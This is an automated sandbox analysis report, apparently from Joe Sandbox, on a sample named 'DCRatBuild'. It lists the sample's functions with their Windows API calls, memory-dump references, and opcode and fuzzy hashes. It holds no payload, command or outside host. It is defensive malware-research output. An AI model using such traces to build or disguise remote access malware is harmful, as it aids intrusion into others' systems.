                                  • Instruction Fuzzy Hash: 3541097050474C9ADF268A34CC94AF7BBAEFB45308F1404EDE69AC7142E7359A85DF60
                                  APIs
                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 008FA79D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: String
                                  • String ID: LCMapStringEx
                                  • API String ID: 2568140703-3893581201
                                  • Opcode ID: 82642b75c40108b272558581f1ac6793e691c001438703cce3ec46964381cba6
                                  • Instruction ID: 2839b33a1494ee8612ba658c8194b815fc53733d647df9e913f26760740a6e2e
                                  • Opcode Fuzzy Hash: 82642b75c40108b272558581f1ac6793e691c001438703cce3ec46964381cba6
                                  • Instruction Fuzzy Hash: 6901027250420CBFCF166FA4EC01DAE7F66FB48760F048114FE1866160DA329961EB92
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008F9D2F), ref: 008FA715
                                  Strings
                                  • InitializeCriticalSectionEx, xrefs: 008FA6E5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CountCriticalInitializeSectionSpin
                                  • String ID: InitializeCriticalSectionEx
                                  • API String ID: 2593887523-3084827643
                                  • Opcode ID: b0680c18bf7fda14e3fe4c5f7cdab9bcf62ed274387d4fe4a45cb9733fa37785
                                  • Instruction ID: 113e78802849c25d451a35a761967107852ed256c7e4c8cea4333dc1708cabc4
                                  • Opcode Fuzzy Hash: b0680c18bf7fda14e3fe4c5f7cdab9bcf62ed274387d4fe4a45cb9733fa37785
                                  • Instruction Fuzzy Hash: 96F0BE71A5921CBFCB196F64DC05CAEBF65FF48B30B008054FD099A2A0DA725A10FBA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Alloc
                                  • String ID: FlsAlloc
                                  • API String ID: 2773662609-671089009
                                  • Opcode ID: d17d09e80f681a289d9a1f0b4d5faa24ff63206bd0ac23748b3d7f08813bae11
                                  • Instruction ID: 7dd017c486abd4d6db728b59c4f1f404aac842b4871cd60087d0d07b2cc39ef0
                                  • Opcode Fuzzy Hash: d17d09e80f681a289d9a1f0b4d5faa24ff63206bd0ac23748b3d7f08813bae11
                                  • Instruction Fuzzy Hash: 81E055B0B5922C6FD2186BA8AC028BEBB54EB69B30B014114FC0897280CD711E00B6E6
                                  APIs
                                  • try_get_function.LIBVCRUNTIME ref: 008F32AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: try_get_function
                                  • String ID: FlsAlloc
                                  • API String ID: 2742660187-671089009
                                  • Opcode ID: d3d9cede8235069757fce389599ed5ee639a686eddf67949295facfc1cdb0543
                                  • Instruction ID: 33b6ffb79ef850da089658068d32c468d2a145af10677be2c2e7a7720ec2e5de
                                  • Opcode Fuzzy Hash: d3d9cede8235069757fce389599ed5ee639a686eddf67949295facfc1cdb0543
                                  • Instruction Fuzzy Hash: 8CD02B337846396EC51032D96C039BF7E44D741FFEF460252FF089A1C28462494045D6
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008EE20B
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID: 3To
                                  • API String ID: 1269201914-245939750
                                  • Opcode ID: ea94822389d13356a95f14dd0a7f66e41be1f0f0baf53b1565a47c5d3ab1af48
                                  • Instruction ID: df62dfddaf93d6319b026d5856cfad7b644930a0b7e1266e1fad744a528d8553
                                  • Opcode Fuzzy Hash: ea94822389d13356a95f14dd0a7f66e41be1f0f0baf53b1565a47c5d3ab1af48
                                  • Instruction Fuzzy Hash: 2BB012A126E2417C320C5206FD06D36031CD4C2B54330C01AB306E40C09A809C0D4433
                                  APIs
                                    • Part of subcall function 008FAF1B: GetOEMCP.KERNEL32(00000000,?,?,008FB1A5,?), ref: 008FAF46
                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,008FB1EA,?,00000000), ref: 008FB3C4
                                  • GetCPInfo.KERNEL32(00000000,008FB1EA,?,?,?,008FB1EA,?,00000000), ref: 008FB3D7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CodeInfoPageValid
                                  • String ID:
                                  • API String ID: 546120528-0
                                  • Opcode ID: 1cd9e787c2cd6948d2290b95dc8484fe6b2f6d07d58d1f148fa6f7b08cbe56a9
                                  • Instruction ID: bc3b3b07d8122b6c180f22d975a6b67a7974a2e231dccb794e47ec1416ec65e0
                                  • Opcode Fuzzy Hash: 1cd9e787c2cd6948d2290b95dc8484fe6b2f6d07d58d1f148fa6f7b08cbe56a9
                                  • Instruction Fuzzy Hash: 775175B0A0020D9EDB24CF75C8806BABBE5FF65310F28846ED286CB253D739D941CB95
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D1385
                                    • Part of subcall function 008D6057: __EH_prolog.LIBCMT ref: 008D605C
                                    • Part of subcall function 008DC827: __EH_prolog.LIBCMT ref: 008DC82C
                                    • Part of subcall function 008DC827: new.LIBCMT ref: 008DC86F
                                    • Part of subcall function 008DC827: new.LIBCMT ref: 008DC893
                                  • new.LIBCMT ref: 008D13FE
                                    • Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 7785fd04deac294ba3880b3b29c3a72ca41a5f8b00a0cabdf19eaaf841201361
                                  • Instruction ID: 99188ff290fd4f8992be4521644aa0f60ab236c4e1ea75dd5484cb302f216fbf
                                  • Opcode Fuzzy Hash: 7785fd04deac294ba3880b3b29c3a72ca41a5f8b00a0cabdf19eaaf841201361
                                  • Instruction Fuzzy Hash: 354126B0805B409ED724DF7984859E6FBE6FF19300F404A2ED2EEC3282DB326554CB16
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 008D1385
                                    • Part of subcall function 008D6057: __EH_prolog.LIBCMT ref: 008D605C
                                    • Part of subcall function 008DC827: __EH_prolog.LIBCMT ref: 008DC82C
                                    • Part of subcall function 008DC827: new.LIBCMT ref: 008DC86F
                                    • Part of subcall function 008DC827: new.LIBCMT ref: 008DC893
                                  • new.LIBCMT ref: 008D13FE
                                    • Part of subcall function 008DB07D: __EH_prolog.LIBCMT ref: 008DB082
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: 5b3141e81bd0a94d01249a949b5c1788ac9551c4ee3962c472b02cee3433ec99
                                  • Instruction ID: ba3b0b2b7d09aa108b1d83bbee1d31b543d8370c81ae5dad8f62c53a21f567a8
                                  • Opcode Fuzzy Hash: 5b3141e81bd0a94d01249a949b5c1788ac9551c4ee3962c472b02cee3433ec99
                                  • Instruction Fuzzy Hash: 4D41F4B0805B409EE724DF7984859E6FBE6FF19300F504A2ED2EE83282DB326554CB16
                                  APIs
                                    • Part of subcall function 008F8FA5: GetLastError.KERNEL32(?,00910EE8,008F3E14,00910EE8,?,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F8FA9
                                    • Part of subcall function 008F8FA5: _free.LIBCMT ref: 008F8FDC
                                    • Part of subcall function 008F8FA5: SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F901D
                                    • Part of subcall function 008F8FA5: _abort.LIBCMT ref: 008F9023
                                    • Part of subcall function 008FB2AE: _abort.LIBCMT ref: 008FB2E0
                                    • Part of subcall function 008FB2AE: _free.LIBCMT ref: 008FB314
                                    • Part of subcall function 008FAF1B: GetOEMCP.KERNEL32(00000000,?,?,008FB1A5,?), ref: 008FAF46
                                  • _free.LIBCMT ref: 008FB200
                                  • _free.LIBCMT ref: 008FB236
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: _free$ErrorLast_abort
                                  • String ID:
                                  • API String ID: 2991157371-0
                                  • Opcode ID: 38feb75116968f0ee928209115c9b174cd699d733095cc84142be03555d9627d
                                  • Instruction ID: 8d2993341cf0b0e7dacb9d59ddf7c8ad67b510ee869c66107e1c1bccecd5f9bc
                                  • Opcode Fuzzy Hash: 38feb75116968f0ee928209115c9b174cd699d733095cc84142be03555d9627d
                                  • Instruction Fuzzy Hash: 62317F3190420CAFDB10EFB9D841ABDB7E5FF45320F254099EA14DB291EB729E41DB51
                                  APIs
                                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008D9EDC,?,?,008D7867), ref: 008D97A6
                                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,008D9EDC,?,?,008D7867), ref: 008D97DB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 320d3fc4664db2bc6329fa73c9f14a73f04c2a1a723127255dddb0fda900fd7d
                                  • Instruction ID: 2264ee97ed16fa25d9e5b4124ca51e99c6ee0e5055fdfa057ae8307c8be498f3
                                  • Opcode Fuzzy Hash: 320d3fc4664db2bc6329fa73c9f14a73f04c2a1a723127255dddb0fda900fd7d
                                  • Instruction Fuzzy Hash: 652126B0514748AFD7308F65C885BA7B7E8FB49764F004A2EF1E5C2291C374AC449B21
                                  APIs
                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008D7547,?,?,?,?), ref: 008D9D7C
                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 008D9E2C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: File$BuffersFlushTime
                                  • String ID:
                                  • API String ID: 1392018926-0
                                  • Opcode ID: 2a7c10216789bc274d1051f65a1a4f5fda6271733ef5d533517c6a5b67ff3de7
                                  • Instruction ID: 637f1dfde981077343c75e2c56bbe4ab4794bb2c6db91ef089bbaf0b2fb29c60
                                  • Opcode Fuzzy Hash: 2a7c10216789bc274d1051f65a1a4f5fda6271733ef5d533517c6a5b67ff3de7
                                  • Instruction Fuzzy Hash: A321D631158286AFC714DE25C451AABBBE9FF96708F044A1EF4D1C7241D729DA0CDB61
                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008FA4B8
                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008FA4C5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AddressProc__crt_fast_encode_pointer
                                  • String ID:
                                  • API String ID: 2279764990-0
                                  • Opcode ID: a8587e63ababb09ca1fbd038ba033f25c17e38436510106a370a50b2d5086730
                                  • Instruction ID: 3b98de12dcab0e0e5701dada69f9b6c5e5433eac4a524f2103a85ac28a9090d3
                                  • Opcode Fuzzy Hash: a8587e63ababb09ca1fbd038ba033f25c17e38436510106a370a50b2d5086730
                                  • Instruction Fuzzy Hash: 1C112373A111288F9B2A9E38EC4487A73A5FB907347164220EE19EB254EA70DC41D6D6
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,008D9B35,?,?,00000000,?,?,008D8D9C,?), ref: 008D9BC0
                                  • GetLastError.KERNEL32 ref: 008D9BCD
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: a9ed9d58033c2667c497edfd776391fe42d197f963f88577c680dc9abbad062a
                                  • Instruction ID: ca04a60f41e774de4847c8eac6e117eb5da4401575cdf9bd082280c27c19f331
                                  • Opcode Fuzzy Hash: a9ed9d58033c2667c497edfd776391fe42d197f963f88577c680dc9abbad062a
                                  • Instruction Fuzzy Hash: 3E01A9312142259F8704CE55AC9496A735DFFC5731B15872FE997C7390C67198059A21
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 008D9E76
                                  • GetLastError.KERNEL32 ref: 008D9E82
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: 57d818ea6aef81b3c0171fd5e22ba920b150626af4c9f0c565b66cbc40dd28af
                                  • Instruction ID: eb8018b8211509ed581d93134cf2dfb0234d5551a58ab18552cb2d9e4c1cea18
                                  • Opcode Fuzzy Hash: 57d818ea6aef81b3c0171fd5e22ba920b150626af4c9f0c565b66cbc40dd28af
                                  • Instruction Fuzzy Hash: 350180717052046BEB349F6AD84476BB7D9EB84328F144B3EF186C2780DAB1E8488611
                                  APIs
                                  • _free.LIBCMT ref: 008F8627
                                    • Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A
                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00910F50,008DCE57,?,?,?,?,?,?), ref: 008F8663
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Heap$AllocAllocate_free
                                  • String ID:
                                  • API String ID: 2447670028-0
                                  • Opcode ID: 5705392239da74871860b1e785537f062723413ed97c318d620eb2af0abc36c3
                                  • Instruction ID: 1d646417aa24e332d3abbb10efad8811446f9e151350a4bb5dcdac628b0320a2
                                  • Opcode Fuzzy Hash: 5705392239da74871860b1e785537f062723413ed97c318d620eb2af0abc36c3
                                  • Instruction Fuzzy Hash: BFF0C23220511DEADB212A39AC09A7B3758FFB1BA4F244115FB14DA291DF28C80095A6
                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?), ref: 008E0915
                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 008E091C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Process$AffinityCurrentMask
                                  • String ID:
                                  • API String ID: 1231390398-0
                                  • Opcode ID: 5fc7a4197a001cb4ba838f9ccc0391389ba77963a5edf50bfbd9f6a95dff5a0f
                                  • Instruction ID: 4ef7ae7a87cf6f49d7b386a5d4b8ac06f6381c1890ec1871104e98a50c0eec49
                                  • Opcode Fuzzy Hash: 5fc7a4197a001cb4ba838f9ccc0391389ba77963a5edf50bfbd9f6a95dff5a0f
                                  • Instruction Fuzzy Hash: FFE09B32A25149BBBF05DEB59C044BB7BADFB052147104979A806D7102F674DD418E60
                                  APIs
                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA458
                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008DA27A,?,?,?,008DA113,?,00000001,00000000,?,?), ref: 008DA489
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
